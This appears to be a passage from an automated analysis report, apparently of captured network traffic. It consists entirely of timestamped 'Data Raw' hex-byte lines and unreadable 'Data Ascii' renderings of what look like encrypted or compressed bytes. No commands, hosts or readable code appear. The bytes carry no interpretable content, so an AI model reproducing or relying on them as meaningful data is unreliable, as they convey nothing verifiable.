7f 5e ab ec 1c b1 08 37 e9 d8 60 cd 94 cb e9 17 18 36 8f 79
                                                                  Data Ascii: #_Sebf=[[ .3=Ph+"S}@wT+(Wb. ~4uw(I@Qw2ftR:z:J>#z1z7W5/c<F}-N#<y"y@7R{jgeN;R)Q^7`6y
                                                                  2021-09-30 21:52:28 UTC2288INData Raw: a4 d1 67 85 98 cb d6 71 55 8a 03 fc 50 29 35 ab ed 48 7d a9 24 d6 6f 35 fe 97 ab 3f 78 6c 35 51 f9 95 be 28 0a 86 e9 d8 70 f6 a4 56 48 23 5d 88 e2 3e 29 a1 b5 0d 33 85 a7 61 6a 69 7b f4 4c 44 d4 ec 3b 15 2f 01 47 d8 3b da 89 19 8e 56 c1 04 ad 69 98 44 31 5e 3f dd 33 71 9b 87 3b a2 b1 71 e2 8c af f9 71 a1 f8 03 b5 3d e4 30 e8 b5 32 09 68 49 dd af a4 4f 7d 4c 53 8d cf 16 5d d2 ca 0c 02 57 e1 55 7d a3 9f b5 83 cf a9 c7 b5 c9 a3 fc 77 13 bb d2 6d e0 b8 30 a9 d5 9a 95 35 6e 7b 73 4c 13 e3 c9 05 24 8d b8 73 4a 04 d8 3a 7b 56 32 6f 32 25 99 18 c9 28 73 dd eb 58 ee 1a ba f2 88 44 5a 6a 1a b9 4e 6c 17 c3 b8 59 f5 4c 38 37 57 bd c7 67 18 5d fa bc da 55 db 27 f9 2d 9b 64 35 3f 2b 2e 6f 13 bd 5b 6f 6b 52 aa c9 23 38 db 89 f6 03 1e e2 a7 b6 e7 6f 80 5d c1 48 3f 7c fe
                                                                  Data Ascii: gqUP)5H}$o5?xl5Q(pVH#]>)3aji{LD;/G;ViD1^?3q;qq=02hIO}LS]WU}wm05n{sL$sJ:{V2o2%(sXDZjNlYL87Wg]U'-d5?+.o[okR#8o]H?|
                                                                  2021-09-30 21:52:28 UTC2304INData Raw: d2 9c 59 03 fe b8 0d 4f 60 1b 1d ef 25 a1 e0 3c 57 c1 c7 b8 d9 b4 4b 9b f6 ed 8d 76 86 42 e4 9b 40 ed 53 dd f3 11 79 f3 ba 9c 41 7f db e5 9e d7 e3 19 71 51 98 56 16 ee 6a aa 49 c7 5d 56 76 af 87 10 d8 9d a7 c8 fa 4e d8 b7 a5 54 36 86 40 82 5c d8 40 27 08 79 65 20 01 86 87 7f 12 f6 4f 58 16 58 92 25 76 3f 71 43 70 22 c2 9f 7b aa a8 78 d4 0e b6 b9 5d 69 07 40 05 29 5f 4a 99 3d 89 2b a1 84 93 7a 60 ec 48 0d b0 3e 12 32 70 4c db 9c 8b ce cf 05 4c d4 eb f8 d6 ca 97 80 36 34 30 9f e3 41 d9 e1 07 bb fc ed ef 22 de 53 74 2b 2c a8 17 0c 93 0d 5f 1d 07 75 a0 3f 34 f7 0d d5 71 ce 4f 30 fe 6b df e2 48 88 54 cb 3d 55 87 8f a0 34 d6 9b e3 98 f5 5b ac 08 d9 b8 70 b5 1a b2 e9 4c 4a c7 fb 14 56 aa 4c 18 d2 28 1c cf 39 65 8c 56 51 b6 94 f5 7b 4e 3d 40 f3 c5 33 93 fb 33 93
                                                                  Data Ascii: YO`%<WKvB@SyAqQVjI]VvNT6@\@'ye OXX%v?qCp"{x]i@)_J=+z`H>2pLL640A"St+,_u?4qO0kHT=U4[pLJVL(9eVQ{N=@33
                                                                  2021-09-30 21:52:28 UTC2320INData Raw: 52 2f 36 ae d0 2d f2 17 f5 25 04 96 50 6e a6 6d c7 89 61 24 32 a0 4b 81 bf ae 3b b0 a5 f5 87 93 cc 1a 36 8a ce fc 8a 4b 83 57 53 e2 1f c8 16 d6 f0 1f c4 e8 ce 13 52 ba 9c 25 80 42 5a dd 50 5c 5c 54 67 78 b6 73 21 60 29 0e 60 ee 6b b5 56 82 a5 3c 2a 39 d5 fa f1 98 95 8e 3d dd 0c 68 24 d3 91 77 4b 59 c3 ef a9 b1 96 be 90 8c 93 fb 94 f0 5d 06 18 7e 1d db 6c 70 66 b9 9f 62 40 41 7c 2b bc c6 4a 68 b8 86 2e f7 6d cb df 24 62 1f 12 38 3b 2c 20 93 9a ca 01 e2 0b eb ac 6d 4e 9d cc 0b 15 b6 a2 da 6e c2 ea 48 a8 48 cc eb e6 c9 49 a1 01 64 dd 03 68 c5 0a bc 09 dd f1 da 42 a5 3b 89 1f e5 99 32 14 be 85 ce 1e 3e 6a 4a f8 83 55 35 a7 7e dd 65 1f 6d 75 f8 96 f6 5a 83 c7 41 92 1e 1c 06 d0 df c2 1c 50 e4 1c dd 0a 8f 19 44 11 78 b9 a7 0a 66 a2 d1 14 ba 46 21 e9 88 a4 fd bb
                                                                  Data Ascii: R/6-%Pnma$2K;6KWSR%BZP\\Tgxs!`)`kV<*9=h$wKY]~lpfb@A|+Jh.m$b8;, mNnHHIdhB;2>jJU5~emuZAPDxfF!
                                                                  2021-09-30 21:52:28 UTC2336INData Raw: 01 4d 2e 3f f8 ab 23 51 e0 20 3e 8f 24 a5 95 66 3d f4 8a 2c bb 30 1f 5f 76 dd d2 23 80 ef ae d4 68 4f ce 60 47 67 a9 47 08 57 77 95 4b bb 6f 8d 90 c3 05 1b 57 7a de 59 a6 bb a0 be 1d 10 ca cc 80 15 8f f0 0b 70 bf 98 87 23 a2 89 97 6d 9a ca 22 9b b4 c6 73 c5 ea 51 7c d7 e6 fb d4 a7 a7 50 6b cf fd 51 ee 33 1c 16 ce 43 07 77 1f 77 35 da 32 66 61 1f b2 0d 87 12 57 49 83 9c 6a f0 0e cf 7c d4 25 dc 13 03 ef 55 80 d6 6f 0f 9b de ec 19 f6 a9 03 14 9a 4d ab dd 33 3c e0 8a 10 d7 e5 9a 80 5e 89 cf 81 f4 6a 2f 44 79 c3 d4 c1 76 b7 e8 bb 52 47 0c 6d c6 81 57 53 6f a3 d6 10 35 5b 9f b9 d2 90 b4 8e f7 52 a2 98 02 b0 45 1a bc 2b 61 a1 c2 4a 28 72 a1 6a 93 a4 55 7d 22 2e a0 34 0d 82 f2 97 8c ce 2b 73 23 90 67 fe 3d e9 db 62 47 1a 66 28 10 ae ac 60 a1 3b 59 6b 11 60 e3 21
                                                                  Data Ascii: M.?#Q >$f=,0_v#hO`GgGWwKoWzYp#m"sQ|PkQ3Cww52faWIj|%UoM3<^j/DyvRGmWSo5[RE+aJ(rjU}".4+s#g=bGf(`;Yk`!
                                                                  2021-09-30 21:52:28 UTC2352INData Raw: 44 a4 ab 8b ab b0 04 06 23 37 bb 97 e2 e4 0f 22 77 6a 75 49 ce 0c 24 7d 01 72 b7 0f 11 04 44 de bd e7 82 fa 56 a9 10 79 c2 00 52 90 d9 a5 9b 9a e1 de a3 c3 85 db 6a c3 09 0a 30 fe e7 8e c1 0b 0e 08 e6 36 dd 79 48 e9 58 1b 94 54 58 88 d5 13 a4 ff 41 ae b6 94 3f 4c 91 3e 37 88 cb e5 74 6f 17 a7 53 17 b9 9e 00 a2 ea d6 dd d5 39 08 f4 85 9f cc 18 52 aa d2 97 ba d6 04 c6 b6 7d 03 70 1e 8a d7 53 af 2d 19 b2 74 b5 f5 51 d2 85 3d 29 1f 0d a6 34 cf dd c7 1c 83 aa 9c 51 32 a0 7c d2 ac 79 f1 60 4d 85 f0 00 dd 28 fd 59 31 04 63 c0 63 dc f0 90 b8 30 71 d1 fc 27 ec 73 b9 07 54 a1 f5 35 56 c1 1b 78 ce ba f0 0f 8e 8c 67 34 ac 97 85 01 0d 4f f9 55 a5 d6 72 72 95 6a 6f e4 03 28 45 3a b8 2c 4a 33 27 01 1f 1f 78 02 0a 8d 97 51 cd 0b 10 57 a0 0f 3b f7 02 a3 80 57 da f0 eb 84
                                                                  Data Ascii: D#7"wjuI$}rDVyRj06yHXTXA?L>7toS9R}pS-tQ=)4Q2|y`M(Y1cc0q'sT5Vxg4OUrrjo(E:,J3'xQW;W
                                                                  2021-09-30 21:52:28 UTC2368INData Raw: d7 0f 4d a9 51 fa e5 53 7e a4 14 91 6b d3 e6 3f 71 d7 17 b8 47 a9 f6 48 8b b8 70 26 45 ff 31 78 d8 53 e8 f2 50 2e cb fb 52 af 41 c0 e0 8a 1f 3f 87 ac a2 05 cb 36 6f 55 a3 6c 7a b2 69 6c ed b4 53 47 cf 46 e1 23 78 89 14 7f 69 e3 31 4e 0b 61 45 16 13 5c 1f 90 0c 28 e8 13 18 bb e2 23 c7 61 71 5a 16 17 23 bd 7d 2e e1 37 f5 80 f6 b2 bd de 93 3a b2 5c a4 0f 6b 64 13 94 df 52 50 53 2a 45 23 c4 7d 44 c7 50 81 c7 2e 8b a7 a1 f5 2e 59 76 14 c6 ba 3f 4d a0 5f f7 80 67 cd 0b 33 06 44 d4 89 db bc 0e b5 14 2c df 8b cc 69 0e 71 f3 e6 b2 03 9b d1 74 8a 1b 25 82 f6 04 c7 84 3f 95 60 66 71 7a a8 8f 6f 00 3e f7 10 54 13 14 d0 3f 18 78 c6 cf e7 0b 15 81 4e e8 8a a8 3f 77 16 66 21 f6 22 b5 1f 78 8a be 17 6d 65 2d 34 01 62 fe d1 9b da 11 df 0f ba 43 8d 98 15 b5 23 e2 fb 94 94
                                                                  Data Ascii: MQS~k?qGHp&E1xSP.RA?6oUlzilSGF#xi1NaE\(#aqZ#}.7:\kdRPS*E#}DP..Yv?M_g3D,iqt%?`fqzo>T?xN?wf!"xme-4bC#
                                                                  2021-09-30 21:52:28 UTC2384INData Raw: 52 bc c2 9b b8 7a 7a e4 d7 f5 4c 3b 37 ad 8d 10 d1 f0 a8 4d 01 02 f1 84 ec c0 46 85 59 d2 9a d1 da 40 e3 e8 de 25 63 12 9f af b0 ce 21 8e 8c f0 50 01 ae f5 82 5f 98 f4 4f a0 ae 19 bc c7 aa 70 03 45 29 22 26 ac ab 66 0f 22 64 ff be 5f 29 bf 9d f0 06 5a 3c d5 d1 d0 c9 c6 cf 1b b9 95 84 40 eb 39 b2 1a 10 5b 39 0b 30 bc 49 de f2 b7 67 5a b4 7d bc 51 fa 63 76 85 61 41 80 7f 03 78 6c a9 e7 07 79 6d 51 58 10 67 42 c3 42 92 d5 8c be bb b8 50 7b e1 cf 0c 5a e7 41 e3 97 2f dd dd 6a d1 02 fa 98 a1 88 67 d7 48 9f bc 2c 3f 10 49 4c 46 f8 f1 f4 d0 63 d1 38 46 81 2a 03 ce 89 9b 3c df 59 68 7f f0 ed 55 35 9f d8 88 82 35 c7 69 6a 6d 15 fe 41 21 c3 38 c0 60 87 24 b2 c6 72 97 b4 3a 30 03 70 f4 9f 57 f0 fd 8f 4d 90 69 4b 0a 5f db f6 e5 32 c1 ef 14 26 5b 07 70 40 bc d8 45 19
                                                                  Data Ascii: RzzL;7MFY@%c!P_OpE)"&f"d_)Z<@9[90IgZ}QcvaAxlymQXgBBP{ZA/jgH,?ILFc8F*<YhU55ijmA!8`$r:0pWMiK_2&[p@E
                                                                  2021-09-30 21:52:28 UTC2400INData Raw: 39 49 4e 73 fc 9c 94 af d2 fa a1 48 68 23 42 96 2c 4c be 6d d0 fe 32 bf 4b a8 f8 06 98 56 e0 bf f2 44 26 b3 6d bf 93 85 7e b1 b8 43 7d 57 c8 93 67 3f 55 da 3f 35 5e 0c eb ce 2c 3b f9 f5 f9 6c 83 07 27 ae 25 76 a1 a9 4d 06 f5 5f b5 2b 7e 06 81 88 3b 27 5d 6f 8a f2 c6 95 eb 2d 7d 03 3f c3 18 f4 14 ab 0b 47 85 bb 29 50 30 5d 97 95 2c 54 d8 4b 2d 51 f4 0f 82 00 fa da 8a 33 2a be 23 ac 97 6c f5 20 82 8f 15 59 7c 0a 62 b4 d5 d7 87 84 15 5f 39 ad f8 69 eb d6 fb 20 c8 5b 33 08 92 0f 0d 1e e0 6d 93 f0 16 e8 38 7c d4 a2 e7 d8 49 12 2e 3d 00 a1 3b d2 cf 68 fc d1 70 69 7b 19 69 fe 38 ac e1 c1 ac 5f 20 8a 65 8a 1c 8f 10 a4 ca 74 6c 41 72 ee 66 23 30 df 84 b4 7a f2 44 b3 c0 9c ab 86 15 09 39 ae 32 a6 71 d1 d6 ca ee ad 9e 7a 34 d2 f2 e0 f0 f1 9f 16 38 20 b1 5e 51 1b 8c
                                                                  Data Ascii: 9INsHh#B,Lm2KVD&m~C}Wg?U?5^,;l'%vM_+~;']o-}?G)P0],TK-Q3*#l Y|b_9i [3m8|I.=;hpi{i8_ etlArf#0zD92qz48 ^Q
                                                                  2021-09-30 21:52:28 UTC2416INData Raw: 18 11 14 21 94 6d 04 5b 30 1b 49 bc 8f 2e 5a 87 f3 79 a9 ad 6b 1e 17 ea 8c 1a d5 81 a7 54 50 3e f0 b4 a2 7a 17 72 57 0b 74 05 36 19 15 7b 61 8a 30 41 09 4f 05 5d 4a 12 6c c2 47 66 08 ac 9d 18 81 a6 f6 76 5d 0c f0 da 74 66 74 00 af f8 11 5a c1 f0 28 64 40 4e 1e 0e 8f c4 ab 98 6b 0c 4e a2 02 1b 0a 0b aa 3d bf 5d 49 a2 e6 c2 14 04 cf b5 66 1e 2e 04 e8 63 18 6f 88 95 a5 8a ce 67 d6 23 5f cb c4 7a 3d 6c f5 bc 19 a4 f6 8c 48 9c 70 c1 ea 93 b5 eb 04 63 0f 06 39 c1 3c 32 10 38 d9 47 fa 16 ec df 67 0d 24 5c cf 4d 2f 14 90 3e e4 44 a0 be f7 1f 12 36 ed 3c fe 13 d9 be d1 03 56 d8 59 f2 24 e7 28 a2 06 8c 47 a6 e8 bc a2 28 75 6e 67 eb ad 2c ca b8 4d 43 d7 6f 0e 6b 18 2e e5 8e c6 45 29 c5 06 e1 03 99 e5 1e 8d b2 58 be 49 d7 ce 6c f3 50 8c f3 13 48 2d 58 a3 b8 29 cb 42
                                                                  Data Ascii: !m[0I.ZykTP>zrWt6{a0AO]JlGfv]tftZ(d@NkN=]If.cog#_z=lHpc9<28Gg$\M/>D6<VY$(G(ung,MCok.E)XIlPH-X)B
                                                                  2021-09-30 21:52:28 UTC2432INData Raw: ad 45 23 ec 7d d7 d3 65 c1 f1 fe 7c 9c c5 e0 9e 4c a2 48 c5 2b dc 5a 9a d3 27 5d 4c a1 9b ab ec 0e fb 2f 00 0c 5f 77 57 04 41 65 94 57 8e f8 d5 33 b0 7f d3 bd 02 40 78 15 2f 5e 71 02 8e e8 e4 4c 1c 6e 0b 17 b4 08 2e 91 6c 19 8b c3 ca 65 a7 21 18 26 ca 12 f1 e3 d2 8a b4 4d 4b 21 a0 e7 38 06 31 7b ef 2c a8 e7 ff ec 29 fd a0 cc 17 68 35 0c 5c f3 e1 ad 7f 99 43 d7 b4 77 73 92 0a 65 f1 cf 12 a2 12 b3 de cb 78 22 61 7f 90 48 16 cc f3 de 81 a8 04 13 47 67 55 ee 44 e7 7a ed 9e 5b c0 4a 4e 6f d1 39 1c 17 0e 92 2b ec 2f 40 04 35 60 71 91 29 43 e4 0f 14 f1 52 32 61 75 bf 3b 6f ca c1 5d d0 4d 52 7b 6f 87 88 e6 46 35 ae 49 55 5a 0e 88 63 cb fd 85 9a 71 95 66 4f 2f 3c 5e eb ae 7c b9 1e 25 1e eb 8c 68 d8 69 de 13 32 25 1b 7f 2d 31 2a cd 7e 80 fb a7 49 5f 5c 50 40 39 a5
                                                                  Data Ascii: E#}e|LH+Z']L/_wWAeW3@x/^qLn.le!&MK!81{,)h5\Cwsex"aHGgUDz[JNo9+/@5`q)CR2au;o]MR{oF5IUZcqfO/<^|%hi2%-1*~I_\P@9
                                                                  2021-09-30 21:52:28 UTC2448INData Raw: b7 da b4 9c d2 f9 5d 79 c9 19 b3 21 5b d4 c2 d6 1d ac df 63 53 44 25 62 dc 95 a9 3f 84 fb be 94 34 ac 39 82 f5 ba 3f a9 58 7b 6f b1 14 1a 7a 63 7c 43 bf 0c 40 c9 00 08 06 5f 4e 50 42 a4 fe 89 57 1f b7 f2 48 bc 47 92 c1 4f 54 4d ea ed 1e a4 db 07 c5 8b 68 ff 4f a8 86 bc 17 65 da 41 fb 16 6d 7d e5 d0 7d 5a b1 6a 62 9d 92 09 70 a6 18 5c 7b 61 9e 36 c4 4f eb d7 c7 84 3b 2a f5 30 91 64 fe c4 9d ed 6b 00 1e 53 1d 9f 1a d5 28 14 4d 40 43 a1 3a 48 f6 35 e0 c0 8c 0a fd ff b0 09 71 4e 8b 6e 35 ea 6b d6 ca fe 15 f4 1c 6d cd 22 b9 23 a5 42 e7 37 6a 95 82 f7 06 b6 0f 1f 2e 84 1c 7f ea 22 ea 6d 17 d7 a7 d5 3f 39 bd fa 93 af b6 fe 0c eb 6c b9 97 17 0f 02 25 18 0e f7 d3 0e 95 7c 81 e8 c5 14 d6 18 67 50 27 e5 61 f4 11 5e c9 9f 81 2c 65 1c 6b a8 73 18 57 e7 95 e2 61 4d 90
                                                                  Data Ascii: ]y![cSD%b?49?X{ozc|C@_NPBWHGOTMhOeAm}}Zjbp\{a6O;*0dkS(M@C:H5qNn5km"#B7j."m?9l%|gP'a^,eksWaM
                                                                  2021-09-30 21:52:28 UTC2464INData Raw: 30 29 3e dd 9d 9b 08 b7 85 60 cc 9c 31 39 0b 46 17 93 9f 0d 0e 44 de cf 30 43 8c 00 ea 6c 5e 10 32 cd 19 71 be a3 46 94 d2 4b b5 7b 05 a1 b1 bb 39 a9 3c f2 8d 7c 34 f3 d3 5f f0 5e 99 18 b5 37 74 0a 8c 78 3e 11 78 6b 29 c6 58 e2 3d 87 7c ce ac 28 e7 f3 68 76 61 a0 68 ba cc ba 62 41 88 23 10 c2 92 a2 fa 0a ed ee b6 42 c4 dd 65 cf d1 e7 19 df 58 a6 dd 36 89 3e 40 2b a1 f4 a2 ca 0e 0d 55 14 95 65 32 92 ca bc d1 ac bf ad f5 e9 ce 24 04 99 c1 32 62 8b 3d 60 37 76 1d 41 a5 40 0b e6 98 a3 8d bd 10 34 49 9b c0 3a 5c 16 8c 98 c1 f4 89 97 2a 62 31 10 2f ba ed da cb 5e 02 11 ae 4c 0f 1c 97 33 03 dd 4f 4a 65 9e 36 bb ee e8 c9 5e 57 b6 9e 3c 9b e3 a6 09 a4 b4 9e a1 05 df ce f4 fd 4b 9a f2 1c 17 90 b7 11 f0 ba 95 e0 ec c0 94 f7 74 78 98 ed b6 6f af 86 79 91 82 3d 32 c6
                                                                  Data Ascii: 0)>`19FD0Cl^2qFK{9<|4_^7tx>xk)X=|(hvahbA#BeX6>@+Ue2$2b=`7vA@4I:\*b1/^L3OJe6^W<Ktxoy=2
                                                                  2021-09-30 21:52:28 UTC2480INData Raw: 0a 74 dc ee b8 54 45 b5 2f d8 b5 35 28 2b 33 37 7f df db aa 22 f7 c8 71 c5 cd 1a 0d 62 43 ad 85 43 89 38 d5 96 41 66 f4 78 9b 00 3a 08 16 f1 46 10 bc 58 e8 2b a7 b1 b7 3f 1d 6d 99 31 1c a4 f1 fd 3c b2 a6 44 08 b6 a7 d9 6d 34 e4 8b 35 0c 57 0b 9c d3 16 44 93 71 43 b9 97 20 22 7a 08 64 65 04 3e b6 72 34 54 4c ae 3a 7d 98 38 46 d9 1a 5a b5 a8 9b 7a 5e 8b 7f 60 e2 9e 66 91 4e b4 98 8f 07 25 79 9e 72 6f eb fb b9 38 52 e8 2f 3b a4 64 cc ec 18 45 84 40 12 99 17 61 07 7e 9c a9 a1 13 02 6b 16 5b c7 d4 4b c4 d2 86 b9 ab ea 4f 49 1a 96 3e 34 b5 72 79 c7 6a ef 3b a6 01 d9 45 81 d2 b7 4a a6 e0 df 02 e7 7c 90 8f dd 7d 95 00 2d 76 89 4a 6b 3d 28 d8 b7 d1 94 e4 5c 9e 13 4e 33 b5 7e 73 32 02 6e 4b 33 2f 77 da 74 75 e4 26 96 70 7b 22 52 b4 2f 52 b0 f8 43 73 b3 0c 4e ad df
                                                                  Data Ascii: tTE/5(+37"qbCC8Afx:FX+?m1<Dm45WDqC "zde>r4TL:}8FZz^`fN%yro8R/;dE@a~k[KOI>4ryj;EJ|}-vJk=(\N3~s2nK3/wtu&p{"R/RCsN
                                                                  2021-09-30 21:52:28 UTC2496INData Raw: 7f a7 92 05 c2 6c c8 1e af e6 0e 70 96 7d 98 76 9c d2 5c 44 aa 88 ce ed c6 3e a6 43 34 b2 cf 59 b6 7c 21 ed 23 04 c9 26 36 ce 76 b1 62 cc cc 1d f0 56 b3 16 99 5a b6 c2 24 9c 46 09 46 c8 cf 8b 90 df bb e2 f1 34 6f 0f d6 25 28 dc 84 17 f1 20 35 d2 cd 78 f2 6e 95 94 9e 82 2f 4c 3c c4 e5 b7 d0 c9 65 0f 30 f7 2e 15 d2 fc 9d 5d b3 5b da 27 16 8b 29 cc 53 9d 0d 05 f0 4c 36 ec be 52 d1 3d 48 c5 76 7b bb c5 6e fb 05 25 fb 85 c8 bb d7 3b 6f 40 05 cf 50 93 89 cc 57 3e fe 28 85 17 07 c3 70 53 53 06 c8 9d 73 ae 86 9e 49 4e 3e 22 f8 42 61 c6 e0 b7 b9 c3 22 16 dc a1 54 7b 99 61 4b c5 58 94 e9 a4 d4 2f 44 1c c7 cc 8b bf 19 26 61 dc b3 05 1e 7f 39 47 81 31 a5 09 56 0d e1 f9 77 6a 44 8a 66 cb dd e0 bc 67 29 ff f9 df 50 43 1c c5 b2 66 d8 50 9e 9a 04 73 1e f1 7a ee 9b 55 48
                                                                  Data Ascii: lp}v\D>C4Y|!#&6vbVZ$FF4o%( 5xn/L<e0.][')SL6R=Hv{n%;o@PW>(pSSsIN>"Ba"T{aKX/D&a9G1VwjDfg)PCfPszUH
                                                                  2021-09-30 21:52:28 UTC2512INData Raw: f5 34 f9 08 df 85 23 79 a4 39 47 92 e2 1c 61 ac 69 9e a9 77 4f 5f 0a 46 6d ec 82 89 57 82 f9 7f 0f e7 78 e8 65 87 02 56 34 d1 fc 91 6c 2e 29 31 da 2f b1 50 49 9f b3 1d f1 90 d2 a4 15 d7 22 7e 0f bf bb 6e 1c 58 03 30 6e 4c d2 ce 54 84 69 e5 e9 11 80 51 0d 1f 02 f7 92 0f ff 71 5f ba a9 1e e4 4f 8b b6 37 6b 7a a6 cb 90 2e 62 95 77 ef f9 d9 bb 64 a7 bc 9e 3d 0a 4c a1 af 54 a9 4c 08 a1 5a e1 e3 e6 68 17 eb 68 66 ea 92 df 6a a0 7f 96 63 f9 92 87 07 17 df cd be 6a e7 96 73 0e d5 fe d2 38 38 66 b0 30 e0 53 6f 48 b8 e0 4c fa 8b 5a a5 1e e1 33 8f dd 56 32 e3 27 37 43 e8 10 b7 ea ff 95 41 ec cb 3b 7b db 65 c7 7b 49 f9 06 cc fa 73 d1 25 49 56 93 26 25 f3 7e 94 2b 38 6a 39 88 2d 71 bf f3 03 24 a9 23 9b ff 8b cf 99 67 84 cf 01 7f a0 9b 89 c6 27 6e a1 cd 6c 5b 8a c8 5d
                                                                  Data Ascii: 4#y9GaiwO_FmWxeV4l.)1/PI"~nX0nLTiQq_O7kz.bwd=LTLZhhfjcjs88f0SoHLZ3V2'7CA;{e{Is%IV&%~+8j9-q$#g'nl[]
                                                                  2021-09-30 21:52:28 UTC2528INData Raw: 74 d3 83 0d 3d 88 d8 97 10 f7 e2 73 b1 09 69 27 a8 b1 29 b2 75 dd da c1 d6 6c c0 4c ee a1 f0 f0 06 95 48 de 3b 45 e6 57 92 e4 df f9 7d c3 24 be 15 fd 56 3d 8f d9 8e 74 50 e8 c5 4f f0 4e bc 7b 36 c8 5d 03 a6 ad 99 d9 d2 8a 3d 4f a2 5f 57 e1 c0 38 2d 87 8c 70 fb 69 36 d1 60 dd fa 2d 38 a6 99 be 36 a9 e0 f1 fc 77 1c aa 5a b6 cd 97 ac c7 52 3f 73 f1 10 de aa 24 ac 80 cc 30 a5 63 25 98 7d d1 7d 77 3e fd 57 0b aa 25 93 77 72 20 c4 5d 73 6a ce 7f e8 60 5b 76 40 9e e1 59 d0 d6 de 19 8b 85 38 34 7b 22 41 ed 18 2c 98 53 de 93 b7 c7 b1 64 a0 b7 f5 6d b5 5f c8 e7 23 06 cc dd 53 08 ae 9e e5 47 46 27 30 13 33 98 ce fc 47 3b 3e 3d 8e 39 70 65 a5 11 1a 9b f6 04 50 da 15 f9 a2 fb 11 2b e4 69 44 a8 58 ca a1 9e 0e 55 0b da 76 e2 65 df 62 4a 99 31 d7 11 81 63 27 ba d7 20 71
                                                                  Data Ascii: t=si')ulLH;EW}$V=tPON{6]=O_W8-pi6`-86wZR?s$0c%}}w>W%wr ]sj`[v@Y84{"A,Sdm_#SGF'03G;>=9peP+iDXUvebJ1c' q
                                                                  2021-09-30 21:52:28 UTC2544INData Raw: 61 ca 54 27 f9 f6 28 e3 dd cf 1a 34 27 97 dc e8 49 12 24 11 ad e4 4e c4 a4 c6 49 0b 9f 42 a5 9f 49 a3 22 18 be 4d 8d 15 a3 39 63 d9 ee 76 ef 0b 7f de 8d f5 39 f7 a0 ee 37 69 a6 93 3a 8e ac 13 08 66 9f 48 59 28 04 6c 43 85 80 03 67 2d 3f f8 9a 56 d4 22 79 ad 3d ff f5 51 3b dc a2 da 55 70 c1 cf 4b 28 fa 5f 25 ff f1 2a d5 e5 67 53 06 46 08 c5 78 40 2a e8 3c c2 c5 9b 27 a9 e3 9c d5 f3 b1 af f2 1b 87 2a 02 a3 04 90 25 a8 28 2b 0b f4 8c 97 48 c6 06 52 91 34 27 1f 0a a6 9a 9f 5a d6 e8 6f 4b c8 2f 3e c9 9d f7 0a fe 40 4a ee b5 d2 8e 93 2b 38 a9 08 1f e8 45 85 b7 44 ac 5f f2 e8 ba fb cb 59 01 20 52 18 81 21 6a 87 b1 8e ee c0 30 65 14 92 3b 58 ea 39 c3 3f 33 d4 58 a7 bd 37 8e 53 e4 1b a6 77 74 f0 83 65 93 e8 8e 5a ff d9 36 fd dd 35 be 5c c1 60 c7 93 d7 49 2c 64 7a
                                                                  Data Ascii: aT'(4'I$NIBI"M9cv97i:fHY(lCg-?V"y=Q;UpK(_%*gSFx@*<'*%(+HR4'ZoK/>@J+8ED_Y R!j0e;X9?3X7SwteZ65\`I,dz
                                                                  2021-09-30 21:52:28 UTC2560INData Raw: bc ad 44 58 bc 5d 6d f4 7c 99 30 57 69 7e b6 ec 7f 5a 8b 80 2b 51 d8 35 36 cf 5a 98 03 55 a0 4a 66 cd e4 4d 5d 4b 7b c2 29 f7 f9 76 91 57 89 77 05 f1 51 96 c8 cc 6b cb f9 7f dc 44 7c e7 5a ca 97 c3 e7 ad 43 6f 78 24 68 8a 58 0f d5 3e 81 13 e5 7e 98 5f 20 aa 7a 91 02 ae 64 2c ed 02 81 02 b1 81 e0 b8 1b 66 49 66 e0 00 b7 c1 5f b0 6c c6 d2 63 55 54 5c aa 90 17 4b db 26 8d 98 21 24 cf 33 0b ce 2f 99 23 d9 07 78 fd 32 b3 2c 1d fe 34 69 3d a2 1a 96 6b 34 a4 d0 7d 71 f0 34 89 a6 8a c5 8f 1d 73 00 6b 92 6c db 1a e6 f5 2a c1 e7 0c dd 5d 43 74 04 ef 12 43 f5 f3 76 66 32 5a 96 3f 28 2a 79 5c f2 b2 e4 9b 63 88 d0 8e 30 a9 d1 76 00 66 62 25 0f 6c f8 9b 33 ea 00 4c b9 9e 0d e2 e3 7d 4e 6c 96 e4 e7 ce b4 62 2f a1 cd c1 0d 06 ce 8c 05 a9 5d ac 27 49 e0 c2 e5 e3 06 1e d6
                                                                  Data Ascii: DX]m|0Wi~Z+Q56ZUJfM]K{)vWwQkD|ZCox$hX>~_ zd,fIf_lcUT\K&!$3/#x2,4i=k4}q4skl*]CtCvf2Z?(*y\c0vfb%l3L}Nlb/]'I
                                                                  2021-09-30 21:52:28 UTC2576INData Raw: 40 fc 72 5a 1e 39 a4 a9 18 aa ec cc 54 4e 0c 82 26 bb 2e 69 36 b5 e2 89 48 a5 ae c0 05 11 7c e1 ac 8b d8 47 d5 26 fa d4 39 c7 91 a0 00 f0 58 e1 cc de 6b 24 ba 06 09 ac 7f b1 ba d7 35 25 7d 20 94 5a 00 71 3a b5 10 58 ae fb da 24 1d 05 28 5d 04 85 10 4b 9f e1 4f 4a 68 46 a2 d9 13 e3 f9 ab c7 3e 70 1c e5 e6 3a fe b9 8e cf 22 1f 4f a0 de 3b 16 f5 c8 75 70 81 97 64 89 d5 8a 5c ee 55 a9 97 a4 39 e9 0d ed a3 36 d2 40 87 ac 57 39 f3 c5 d6 47 fc da bf 14 72 b0 30 1d 02 09 55 e8 4d b0 bf e0 88 dc 4d fe 24 da a0 92 9e 24 7d ca 53 a7 40 f2 76 6f 25 67 80 46 7c 96 52 94 fa af 6a 16 87 05 26 98 ba 11 3b d5 2d 48 70 5d 69 5f a4 2b 5e 8a d3 4e c9 45 fe 4a 40 0f f9 5c e9 b6 89 d8 0e 92 b9 c9 a2 25 89 b2 a4 93 d9 21 05 f1 ee 88 f6 27 e9 57 a3 db 30 26 90 67 ce 9d 8f 6e 78
                                                                  Data Ascii: @rZ9TN&.i6H|G&9Xk$5%} Zq:X$(]KOJhF>p:"O;upd\U96@W9Gr0UMM$$}S@vo%gF|Rj&;-Hp]i_+^NEJ@\%!'W0&gnx
